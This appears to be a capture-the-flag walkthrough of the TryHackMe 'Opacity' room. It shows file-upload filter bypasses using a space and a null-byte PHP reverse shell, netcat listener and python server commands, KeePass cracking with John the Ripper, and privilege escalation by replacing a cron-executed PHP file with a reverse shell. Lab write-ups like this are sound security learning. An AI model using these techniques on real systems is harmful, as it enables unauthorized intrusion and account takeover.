 |
| https://tryhackme.com/room/opacity |
Let's kick off our enumeration with a nmap and gobuster scan.
When we check out the HTTP website on port 80 we are greeted with a login page. I tried the typical default credentials to no avail.
Let's pivot our efforts and navigate to /cloud.
We have a potential entry point. Immediately I tried uploading a PHP reverse shell. This did not work due to the file upload restrictions that are in place. I then tried to upload a random .jpg on my machine and this worked.
There are a couple easy ways to bypass the file upload restrictions to upload our reverse shell. The easiest of which is to simply add a space like this, "http://<IP>:<PORT>/php-reverse-shell.php .jpg". This will cause the website to accept our PHP file and to simultaneously ignore the .jpg extension so that our reverse shell is executed. Another method would be to add a null value between .php and .jpg. Like this, "http://<IP>:<PORT>/php-reverse-shell.php%00.jpg".
Start a simple python server and a netcat listener on your attacking machine in two separate terminals:
python3 -m http.server 8080
nc -nlvp <REVSHELL PORT>
Using one of the two file restriction bypass techniques from above, upload your file then navigate to the "IMAGE LINK" URL given to you by the website. (Ensure that you remove the ".jpg" when navigating to this URL.
It took a handful of attempts at uploading revshell.php to obtain my reverse shell. Now that we have our reverse shell let's upgrade it to a fully interactive TTY. We do this so that we can utilize all of the features of a fully interactive shell (sudo, nano, auto-tab, etc.) https://zweilosec.github.io/posts/upgrade-linux-shell/clear
After exploring the file system I discovered a Keepass password database in /opt. Let's download this to our attacking box and try to crack it with johntheripper.
From here we can utilize https://app.keeweb.info/ to access the database.
We can use SSH with these credentials to access sysadmin.
We can find the local.txt flag in sysadmin's home directory!
In this directory there is also a scripts directory. Let's check that out.
If you remember from earlier, when we uploaded our reverse shell it was deleted shortly after upload. The /cloud webpage also mentions "5 minutes file upload". Based on the contents of this script, we can see that the file are deleted by this script. Which means that this script runs every couple of minutes.
Additionally, we can see that the user "sysadmin" own the sub-directory "lib" which contains the file "backup.inc.php". We can exploit this by copying this file to our home directory, replacing it's contents with a reverse shell, deleting the file in "/lib" and copying our malicious version back into the lib directory.
Start a reverse shell and wait one minute.
This room was incredibly fun and required me to expand on my scripting knowledge. I had to spend time really understanding how these scripts worked in order to exploit them.